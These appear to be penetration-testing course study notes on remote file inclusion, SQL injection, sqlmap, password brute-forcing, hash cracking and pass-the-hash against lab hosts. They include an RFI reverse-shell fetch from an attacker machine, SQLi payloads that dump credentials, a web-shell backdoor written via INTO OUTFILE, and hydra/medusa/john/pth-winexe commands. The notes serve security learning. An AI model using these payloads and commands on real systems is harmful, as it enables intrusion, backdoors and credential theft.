* __Remote File Inclusion__: less common than LFI and easier to exploit. In this case, LANG value can be set to the location of a file in attacker's machine (remote address). Suppose that the malicious file is stored as __evil.txt__ on attacker's machine 10.11.0.55. Then, __LANG=http://10.11.0.55/evil.txt%00__. In the file, we can store whatever PHP script we want, including the reverse shell code we used in LFI. 

__SQL Injection__: unsanitized user input for SQL database. 
When the database code uses unsanitized input as its database query argument, or argument used by SESSION or POST, they can be a part of the SQL statement.
* login to sql:  __mysql -u root__ 
    * in sql: __show databases__ then __use webappdb__ 
    * __select * from users;__ 
    * suppose __select * from users where name='wronguser' and password='wrongpass'; __ is a wrong query.
    * __select * from users where name='offsec' and password='123456'__  is a correct query.
In certain buggy PHP codes, if a single row is found matching the required username and password, authentication is granted. It can be bypassed by __select * from users where name='wronguser' or 1=1;# and password='wrongpass';__ or __select * from users where name='wronguser' or 1=1 LIMIT 1;# and password='wrongpass';__, which shows the info of the first one. If the enumeration works, one can simply inject __'wronguser' or 1=1'__ in the vulnerable website's input. 

Most cases, however, attackers do not have much information about the source code of web server, therefore experimentation is required. One way is to enumerate SQL database by abusing SQL query statement and gathering information about the database structures from errors. 
* For example, use __order by (number)__ to enumerate column size of the database. Some vulnerable database could return error messsage if __number__ is greater than the max column number. 
* use __union all select 1,2,3,4,5__ to see display format for data in SQL database. (suppose the result is 1,2,3,5)
* __union all select 1,2,3,4,@@version,6__ will display SQL version in column 5. 
* __union all select 1,2,3,4,user(),6 __will display current user. 
* __union all select 1,2,3,4,table_name,6 FROM information_schema.tables__
* __union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'__
* __http://10.11.1.35/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users__
* __Code Execution__: use the INTO OUTFILE SQL command. http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

It is similar to LFI attack, and the attacker can perform the attack from browser. with __cmd=__ argument

__ Web Application Proxies__: 
Sometimes the injection type attack would not be easy when the website restricts choice of input with a dropdown menu. When the request by webpage is HTTP POST, it is generally not allowed to modify parameters through URL manipulation. To bypass this, one can use a local web proxy. <br>
The proxy can intercept outgoing HTTP request and edit various parameters sent, effectively bypassing all client side restrictions (__TamperData__). With tamperdata, the attacker can modify the parameters at ease.

Kali Linux has automatic tool __sqlmap__ for identify and enumerate SQL injection vulnerabilities. 
* in Kali: __sqlmap -u http://10.11.1.35 --crawl=1__ starts the crawler and find injection point.
* Once injection is found, __sqlmap -u http://10.11.1.35/comment.php?id=738 --dmbs=mysql --dump --threads=5__ to extract information from SQL database. 
* __sqlmap__ can also attempt Web Application Firewall bypass and commit server takeover. __sqlmap -u http://10.11.1.35/comment.php?id=738 --dbms=mysql --os-shell__ executes reverse shell on target. 

### Password Attack

When it comes to password attack, the first thing that comes in mind is __brute force__, nothing fancy. To peform the attack, one needs to have sources: _dictionary files_ and _key-space_. <br>
The word __dictionary attack__ is therefore simply trying to come up with strings as a combination of word list (dictionary) aimed to bypassing the authentication. In kali, the dictionry is located __/usr/share/wordlists__. The most rudimentary brute force simply takes input and generate entropy: __crunch__ in kali does the job. 
* __crunch 6 6 0123456789ABCDEF -o crunch1.txt __ generates a dictionary file containing digits and alphabets, with lenght exactly as 6. (this will generate 112MB file) 
* __crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha__ creates length-4 string from a given charset. 
* __crunch 8 8 -t ,@@^^%%%__ generates len-8 string that has one upper case, two lower case, two special characters and three numeric characters. 
Brute force methods are generally not desired: They require too much space and take too much time.

Windows store hashed user password in Security Acount Manager (SAM) and partially encrypts it with SYSKEY. Windows NT-based OS, up to Windows 2003, store two different password hashes: LAN manager (LM), based on DES, and NT LAN Manager (NTLM), based on MD4. LM has pitfalls:
* Passwords longer than seven characters are split into two strings and each piece is hashed separately
* The password is converted to upper case before being hashed.
* The LM hashing system does not include salts, making rainbow table attacks feasible 
From windows Vista and on, Windows uses NTLM, which case sensitive, support all Unicode chars, but still, passwords are not salted. <br>
__pwdump__ and __fgdump__ are tools that uses memory attack (in particular, privileged LSASS) to crack password hashes. __fgdump__ works similar to __pwdump__ but also attempts to kill local antivirus before dumping the password hashes and cached credentials. <br>
__WCE (Windows Credential Editor)__ is another memory attack tool that can dump the cleartext password, using either DLL injection or reading LSASS process memory. But it is more limited to older versions of Windows.

__cewl__ can be used to customize password wordlist from give domain names: __cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt__ <br>
Users most likely add something extra in their password. To do the same thing, one can use __jon the ripper__ to do the trick. __nano /etc/john/john.conf__ will open its configuration file, where user can add rules. \$\[0-9\]$[0-9] means to add two numbers to the end of each password. <br>
after the configuration, __john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt__. to get the final list.

__Online Password Attack__ refers to password guessing for online services that uses password authentication. Examples include HTTP, SSH, VNC, SNMP, POP3. 
* __HTTP brute force__: using medusa: __medusa -h 10.11.1.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 10__ uses 10 threads to do the work.
* __RDP brute force__: using ncrack: __ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.35__
* __SNMP brute force__: using hydra: __hydra -P password-file.txt -v 10.11.1.219 snmp__ 
* __SSH brute force__: using hydra: __hydra -l root -P password-file.txt 10.11.1.219 ssh__
There are cases when account lockout occurs when multiple login attempts failed. Also, brute force attack generates lots of network traffic. So one has to understand the risk and cost before conducting these attacks.

cracking __Password Hashes__: recover the plaintext password from its hashed value. Three things are important: 
1. hash function output lenghth
2. hash function character set
3. hash function special characters 

__hash identifier__ is used to identify the hash function given the string of hash value. <br>
__John the Ripper__ is again used to crack hash (for example, after pwdump gives the list of password hash, we can use john to process them). 
* Brute force: __john 127.0.0.1.pwdump__  (Assuming the pwdump gives 127.0.0.1.pwdump) 
* __john --wordlist=/usr/share/wordlist/rockyou.txt 127.0.0.1.pwdump__ 
* __john --rules --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump__ 
First, however, one needs to use __unshadow__ to combine __passwd__ and __shadow__ file from compromised system: __unshadow passwd-file.txt shadow-file.txt > shadowed.txt__.<br>
__john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt__

Unlike brute force methods, __rainbow table attack__ makes use of preexisting database of cracked results. However, password __salting__ is effective against this type of attacks.

Sometimes, one does not even need to use plaintext password, instead, hash could be good enough for authentication bypass. PTH utilizes only combination of username and __NTLM/LM__ hashes to bypass authentication. If privilege escalation can be performed and LM, NTLM hashes can be dumped, one can use __pth-winexe__ to gain shell ondifferent machines that use the same hash. This is mostly done on SMB service on windows.
* __export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896__
* __pth-winexe -U administrator% //10.11.01.76 cmd__.